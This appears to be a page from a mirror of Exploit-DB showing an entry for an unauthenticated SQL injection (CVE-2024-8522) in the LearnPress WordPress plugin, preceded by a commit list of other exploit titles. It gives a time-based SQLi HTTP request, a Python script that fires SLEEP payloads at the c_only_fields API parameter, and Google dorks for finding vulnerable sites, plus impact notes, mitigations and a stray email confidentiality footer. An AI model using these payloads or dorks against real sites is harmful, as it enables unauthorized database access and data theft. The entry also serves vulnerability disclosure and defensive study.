bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/52171.txt
Exploit-DB 60175c9963 DB: 2025-04-14 
52 changes to exploits/shellcodes/ghdb

Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection
Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection

Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)

DataEase 2.4.0 - Database Configuration Information Exposure

Cosy+ firmware 21.2s7 - Command Injection

Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)

K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)
ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated)
ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)
ABB Cylon Aspect 3.07.02 - File Disclosure
ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)

Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover

CyberPanel 2.3.6 - Remote Code Execution (RCE)

IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow

Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)

KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)

MagnusSolution magnusbilling 7.3.0 - Command Injection

Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover

Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass

Sonatype Nexus Repository 3.53.0-01 - Path Traversal

Watcharr 1.43.0 - Remote Code Execution (RCE)

Webmin Usermin 2.100 - Username Enumeration
ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
ABB Cylon Aspect 3.08.01 - Arbitrary File Delete
ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
ABB Cylon Aspect 3.08.01 - Arbitrary File Delete

AquilaCMS 1.409.20 - Remote Command Execution (RCE)

Artica Proxy 4.50 - Remote Code Execution (RCE)

Centron 19.04 - Remote Code Execution (RCE)

ChurchCRM 5.9.1 - SQL Injection

CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)

CodeCanyon RISE CRM 3.7.0 - SQL Injection

Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS

Feng Office 3.11.1.2 - SQL Injection
flatCore 1.5 - Cross Site Request Forgery (CSRF)
flatCore 1.5.5 - Arbitrary File Upload
flatCore 1.5 - Cross Site Request Forgery (CSRF)
flatCore 1.5.5 - Arbitrary File Upload

GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)

Gnuboard5 5.3.2.8 - SQL Injection

LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection

Litespeed Cache 6.5.0.1 - Authentication Bypass

MiniCMS 1.1 - Cross Site Scripting (XSS)

MoziloCMS 3.0 - Remote Code Execution (RCE)

NEWS-BUZZ News Management System 1.0 - SQL Injection

PandoraFMS 7.0NG.772 - SQL Injection

phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)

PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)

ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)

RosarioSIS 7.6 - SQL Injection

Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS)
Typecho 1.3.0 - Race Condition
Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)
Typecho 1.3.0 - Race Condition
Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)

X2CRM 8.5 - Stored Cross-Site Scripting (XSS)

Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)

Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
2025-04-14 00:16:26 +00:00

177 lines
No EOL
6.2 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection
# Google Dork: inurl:"/wp-json/learnpress/v1/" OR inurl:"/wp-content/plugins/learnpress/" OR "powered by LearnPress" AND "version 4.2.7"
# Date: [Current Date, e.g., October 30, 2024]
# Exploit Author: [Your Name or Username]
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: <= 4.2.7
# Tested on: WordPress 6.x, Ubuntu 22.04
CVE : CVE-2024-8522CVE-2024-8522 - SQL Injection in LearnPress WordPress Plugin (Python exploit)
Overview
CVE: CVE-2024-8522
Plugin: LearnPress WordPress LMS Plugin (version <= 4.2.7)
Type: SQL Injection
Impact: High
Affected Component: Unauthenticated endpoint parameter c_only_fields in LearnPress API
Description
The vulnerability exists in the LearnPress WordPress plugin, versions up to 4.2.7. An unauthenticated SQL Injection flaw is present in the c_only_fields parameter of the LearnPress API endpoint. This flaw allows attackers to execute arbitrary SQL commands by manipulating API requests without authentication. If exploited, this could lead to unauthorized database access, potentially exposing sensitive data or even allowing administrative control through database manipulation.
Affected Code Path
The vulnerability is triggered by accessing the LearnPress API and injecting SQL commands through the c_only_fields parameter. Below is the code path leading to this vulnerability:
plaintext
class-lp-db.php:702, LP_Database->execute()
class-lp-course-db.php:564, LP_Course_DB->get_courses()
Courses.php:241, LearnPress\Models\Courses::get_courses()
class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses()
class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request()
class-wp-rest-server.php:1063, WP_REST_Server->dispatch()
Proof of Concept (PoC)
The vulnerability can be demonstrated by sending a request to the API endpoint with a malicious payload in the c_only_fields parameter. Below is an example of an HTTP request that injects a conditional SQL statement to test for vulnerability by causing a time delay:
http
GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1
Host:
targetwebsite.com
User-Agent: curl/7.81.0
Accept: */*
Exploitation Script
The following Python script automates the process of sending malicious requests to test for this SQL injection vulnerability by measuring response time, indicating potential success if there is a delay.
python
import requests
import time
# Target URL for the API endpoint
url = '
http://targetwebsite.com/wp-json/learnpress/v1/courses
'
# SQL injection payloads
payloads = [
"IF(COUNT(*) > 0, SLEEP(10), 0)", # Test for successful injection
"IF(1=1, SLEEP(10), 0)", # Basic true condition
"IF(1=2, SLEEP(10), 0)", # Basic false condition
]
# Iterate over payloads and measure response time
for payload in payloads:
params = {'c_only_fields': payload}
start_time = time.time() # Record start time
try:
# Send request to the vulnerable endpoint
response = requests.get(url, params=params)
# Calculate response time
response_time = time.time() - start_time
# Display result
print(f"Payload: {payload} | Status Code: {response.status_code} | Response Time: {response_time:.2f} seconds")
# Check for delay indicative of a successful SQL injection
if response_time > 10:
print("Potential SQL Injection vulnerability detected (delay observed).")
else:
print("No delay observed; injection may be unsuccessful.")
except requests.exceptions.RequestException as e:
print(f"Error during request: {e}")
Google Dorks for Identifying Vulnerable Sites
To locate potentially vulnerable websites running LearnPress, the following Google dorks can help identify sites with the plugin:
inurl:"/wp-content/plugins/learnpress/"
inurl:"/wp-json/learnpress/v1/"
"powered by LearnPress" AND "version 4.2.7"
inurl:"/wp-content/plugins/learnpress/assets/js/"
"LearnPress" AND "WordPress LMS Plugin"
Disclaimer: Use of these dorks should only be conducted in an ethical manner, with proper permissions for testing on identified sites.
Impact Analysis
If exploited, this SQL Injection vulnerability can have severe impacts, including:
Data Breach: Unauthorized access to sensitive data within the WordPress database, such as user credentials, course data, and personal information.
Privilege Escalation: An attacker may leverage the SQL injection to modify database entries, potentially elevating user roles and gaining administrative access.
Site Defacement or Service Disruption: By altering content or database configurations, attackers can disrupt service availability or deface the website.
Recommendations
Immediate Update: Update the LearnPress plugin to a patched version when available.
Web Application Firewall (WAF): Employ a WAF that can filter and block malicious SQL injection attempts.
Least Privilege Access: Configure database users with the minimum necessary privileges to reduce potential impacts.
Conclusion
The SQL Injection vulnerability in LearnPress (<= 4.2.7) is a high-severity issue that exposes affected WordPress sites to data breaches, privilege escalation, and potential service disruption. It is crucial for site administrators using this plugin to update to a secure version and implement protective measures.
This report summarizes the vulnerability, exploitation methods, and recommendations to mitigate risks associated with CVE-2024-8522.
Este mensaje, incluyendo sus anexos, puede contener información clasificada como
confidencial dentro del marco del Sistema de Gestión de la Seguridad corporativo.
Si usted no es el destinatario, le rogamos lo comunique al remitente y
proceda a borrarlo, sin reenviarlo ni conservarlo, ya que su uso no
autorizado está prohibido legalmente.
This message including any attachments may contain confidential information,
within the framework of the corporate Security Management System.
If you are not the intended recipient, please notify the sender and
delete this message without forwarding or retaining a copy, since any
unauthorized use is strictly prohibited by law.
Enviado con el correo electrónico seguro de [Proton Mail](https://proton.me/mail/home).
Reference in a new issue View git blame Copy permalink